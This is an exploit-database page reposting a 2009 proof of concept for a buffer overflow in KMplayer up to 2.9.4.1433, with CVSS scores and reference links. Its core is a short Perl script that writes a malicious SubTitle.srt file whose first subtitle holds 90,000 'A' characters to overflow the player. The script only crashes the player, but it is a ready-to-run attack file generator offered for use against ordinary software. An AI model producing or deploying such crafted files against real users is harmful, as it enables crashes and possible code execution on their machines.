KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC

2009.08.23
Credit: b3hz4d
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!usr/bin/perl ######################## In The Name Of Allah #################### # # The KMplayer (.Srt) File Local Bof Poc # # #Author : b3hz4d (Seyed Behzad Shaghasemi) #Site : Www.Pentesters.Ir #Tested on KMplayer <= 2.9.4.1433 #Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir #Greetings : Shahriyar && Alireza && Soroush and all iranian hackers # ######################### Www.Pentesters.Ir ###################### $junk="A"x 90000; open(fhandle,">SubTitle.srt"); print fhandle "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n"; print fhandle "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n"; print fhandle "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n"; print fhandle "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n"; print fhandle "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n"; print fhandle "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n"; close(fhandle);

References:

http://xforce.iss.net/xforce/xfdb/51882
http://www.vupen.com/english/advisories/2009/1959
http://www.securityfocus.com/bid/35745
http://www.milw0rm.com/exploits/9220


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top